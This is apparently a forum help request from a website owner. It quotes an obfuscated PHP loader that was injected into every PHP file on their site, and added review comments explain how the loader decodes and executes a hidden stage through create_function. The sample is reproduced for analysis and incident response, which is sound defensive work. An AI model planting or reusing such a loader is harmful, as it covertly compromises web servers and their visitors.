Help Needed
-
Hi dear team.
We got this type of malware; this piece of code was added to every PHP file –
<?php
/*
 * Injected PHP loader, quoted as it was found at the top of the site's PHP
 * files. The page rendering has altered the text (typographic quotes, and
 * spaces where the decoder below expects tab characters), so this copy does
 * not run as shown and should be kept only as a reference sample.
 *
 * Layout: one long opaque string ($zlerqbhc) followed by a short decoder
 * stub. The stub resolves three function names from the tail of the string,
 * reassembles PHP source from the string with an offset/length table, and
 * executes the result.
 *
 * NOTE(review): fragments readable inside the string ($_SERVER[...],
 * strstr($uas, ...), @error_reporting(0), a $GLOBALS[...] guard) suggest the
 * rebuilt stage checks a run-once flag and the request's user agent and
 * unwraps a further encoded layer. This is inferred from the fragments; the
 * stage is not decoded here.
 *
 * Triage: any file that starts with this block should be treated as
 * modified. The block sits between the first opening and closing PHP tags,
 * ahead of whatever content the file had before.
 */
$zlerqbhc = ‘3]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!)!gj!|!*1?hmg%)!gj!<**2-4-bubE{ofuopd
ufh
fmjg}[;ldpt%}K;ufldpt}X;
ms;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y]}R;2]7;!}6;##}C;!>>!}W;utpi}Y;tu!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmgM5]DgP5]D6#<%fdy>#]D4]27%)uqpuft
msvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x748y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]585:6197g:74985-rr.93e:5597f-s.973:A x27pd%6<pd%w6Z6<.4
hA x27pd%6<pd%w6Z6<.3hA x27pd%6<pd%w},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%hsbq%)323ldfidk!~!<**qvd}R;*msv%)}.;
UQPMSVD!-idx24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 e:4:|:**#ppde#)tutjyf4 x223}!+!<+{e%+*!*+fepdfe{h+{7y]37]88y]27]28y]#/r%/h%)n%-#+I#)e>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 ($_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 10%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv:.2^,%b:<!%c:>%s: x5c%j:^<!%w
x5c^>Ew:Qb:Qc:W~!%z%)!gj!~<ofmy%,3,j%>j%!<**3x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6
ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5{66~6<]K4]65]D8]86]y31]278]y3f]2>j%!|!*#91y]c9y]g2y]#>>*4-7f_*#ujojRk3
{666~6<&w6< judovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24I&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opop%!-uyfu%)3of)fepdof57ftidsb
bj+upcotn+qsvmt+fmhpph#)zbscB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i {h%)j{hnpd!opjudovg!|!**#j{hnpd#)tut83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#d/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x2yf x27*&7-n%)utjm6< x7fw6*CW&)7gd%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbu7 x45 116 x54″]); if ((strstr($uas,” x6d 163 x69 145″)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:569,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j7)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%t72]48y]#>m%:|:*r%:-t%)3of:op#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nb!>!%tdz)%bbT-%bT-%hW~%#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-7&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4
{6~6<tfs%w6< x7fw6*CWtfsc1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5h3]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np1-bubE{h%)sutcvt)!gj!|!*bubE x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOS%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cqs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf
439275tJGB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:, $ehdgdom = implode(array_map("pvusfs27&6<*rfs%7-K)fujsxX6<#o]o]Y%<*QDU
MPT7-NBFSUTLDPT7-UFO)) or (strstr($uas," x72 166 x3a 61 x31")) or (strst]D6M7]K3#<%yy>#]D6]281L1#/##C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.l} x27;%!<*#}_;#)323lmw!>!#]y84]275]y83]273]y76]277#<!usfsj($n){return chr(or7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]6dfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvuf6Z6<.2
hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqdovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|sb!-#}#)fepmqnj!/!#0#)idubnhfsq)!sp!*#ojneb#-*f%)r($uas," x61 156 x64&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x2tfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppdfdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]25d816:+946:ce44#)zbssftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuif((function_exists(" x6f 142 x5f 163 x74 141 x72 164- x24tvctus)% x24- x24b78]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]38w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%1]211M5]67]452]88]5]48]32M3]317]445]212]445]4%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:NmfV x7f<*XAZASV<*w%)ppdd($n)-1);} @error_reporting(0);]D2P4]D6#<%G]y6d]281Ldz-1H*WCw*[!%rN}#QwTW%hIr x58399#-!#65egb2dc#*<!sfuvso!sb1 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function pv<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f%)7gj6<*id%)ftpmdR6<*id%)dfyfRVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut><##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759oepn)%epnbss-%rxW~!Ypp2)%));$mbmlllf = $esnyokx("", $ehdgdom); $mbmlllf();}}7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<j",str_split("%tjw!>!#]y84]275]y83]248]y83]j6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C xx5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr) 162 x6f 151 x64"))) { $esnyokx = " x63 162 x65 14t
cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{fth%)sutcvt)esp>hmg%!<1″) && (!isset($GLOBALS[” x61 156 x75 1q%:>:r%:|:**t%)m%=*h%)m%):fmjix:b!>!ssbnpe_GMFTQIQ&f_UTPI
QUUI&e_SEEBFUPNFS&d_S8297f:5297e:56-xr.985:52985-t.98f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf
opjujyfopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Zfs!~<3,j%>j%!*3! x27bc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5/!**#sfmcnbs+yfeobz+sfwjFSFGFS
QUUI&c_UOFHBSFTV
QUU56 x61″])))) { $GLOBALS[” x61 156 x75 156 x61″]=1; $uas=strtolower%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-EcSFWSFT
%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSiddlkhtu’;
/*
 * Function-name lookup. chr(375-255) is chr(120), the letter "x"; the slice
 * is 34 characters (223-189) taken at offset 5926 (38864-32938).
 * NOTE(review): with the string as displayed, that slice appears to be
 * "STrrEvxNoITCnuF_EtaeRCxECaLPer_RtS", which splits on "x" into three
 * names - confirm against an unaltered copy of the file.
 */
$yewvasnw=explode(chr((375-255)),substr($zlerqbhc,(38864-32938),(223-189)));
/*
 * Element 0 is called on elements 1 and 2. If the slice above is right,
 * element 0 is strrev, so these hold the reversed names: create_function
 * and str_replace (PHP function names are case-insensitive).
 * create_function() was removed in PHP 8.0, so the stub would only execute
 * on older runtimes.
 */
$dajstlnv = $yewvasnw[0]($yewvasnw[(7-6)]);
$aoplzhs = $yewvasnw[0]($yewvasnw[(8-6)]);
/*
 * ywvybrjs($pnfoabgofn, $zyxuph, $jberlvbk): walks $pnfoabgofn as
 * (offset, length) pairs, appends each substr() of $zyxuph to a buffer, then
 * returns $jberlvbk(chr(9), chr(92), buffer). chr(52-43) is a tab and
 * chr(490-398) is a backslash, so with str_replace as the callback every tab
 * becomes a backslash, restoring the escape sequences of the hidden source.
 * The function_exists() guard avoids a redeclaration error when several
 * infected files are loaded in one request.
 */
if (!function_exists(‘ywvybrjs’)) { function ywvybrjs($pnfoabgofn, $zyxuph,$jberlvbk) { $zpckzk = NULL; for($nhkaxzyw=0;$nhkaxzyw<(sizeof($pnfoabgofn)/2);$nhkaxzyw++) { $zpckzk .= substr($zyxuph, $pnfoabgofn[($nhkaxzyw*2)],$pnfoabgofn[($nhkaxzyw*2)+(7-6)]); } return $jberlvbk(chr((52-43)),chr((490-398)),$zpckzk); }; }
/*
 * Offset/length table, split on chr(142-98), a comma. The largest pair ends
 * at 5871+55 = 5926, the offset where the function-name slice starts, so the
 * table reorders the part of the string that precedes the names.
 */
$kaaimrq = explode(chr((142-98)),’4112,53,5327,38,5695,66,1279,58,2120,53,3339,52,3878,20,5207,50,4545,59,3593,23,4436,31,3246,37,5067,43,2693,66,699,58,3727,64,2021,32,5110,61,3283,29,5010,57,1516,45,3312,27,3136,60,1166,67,3045,41,1337,55,1561,43,3898,40,2577,65,4729,30,2887,52,4759,45,1656,25,1468,48,386,27,82,39,911,26,553,63,5478,61,3791,37,4067,45,5584,20,4804,39,467,62,1442,26,1110,56,51,31,5306,21,1629,27,2859,28,1874,36,5539,45,4604,67,2822,37,1964,57,2264,57,3003,42,5643,24,1792,32,3828,50,4671,58,4046,21,5397,49,5667,28,1729,38,2467,48,890,21,1767,25,5604,39,5871,55,3539,21,3683,44,3086,50,3938,61,983,52,2053,67,5257,49,4413,23,1068,42,3482,57,325,61,757,66,121,41,2383,56,3560,33,2939,64,3616,67,1035,33,5365,32,4843,49,616,49,2439,28,1681,48,211,67,4165,23,413,54,1233,46,937,46,2321,62,4253,62,1824,50,5171,36,162,49,4516,29,4934,25,5831,40,4489,27,2642,51,2173,52,665,34,5446,32,1604,25,4892,42,1910,54,3391,27,529,24,2759,63,4467,22,823,67,2515,22,3999,47,4188,65,4315,45,0,30,30,21,4360,53,3196,50,2225,39,1392,50,278,47,5761,70,2537,40,3418,64,4959,51′);
/* Builds a callable from the reassembled source via the resolved function (an empty argument list and the decoded text as its body). */
$svvzia = $dajstlnv(“”,ywvybrjs($kaaimrq,$zlerqbhc,$aoplzhs));
/* Overwrites the resolved function name with the raw string before the callable is invoked. */
$dajstlnv=$zlerqbhc;
/* Runs the decoded stage. */
$svvzia(“”);
/* Replaces the remaining variables with small integers (121 and 120), discarding the payload string and the callable from scope. */
$svvzia=(376-255);
$zlerqbhc=$svvzia-1;
?>We don’t know what is this.
Can someone help us find where this malware came from?
Thanks in advance.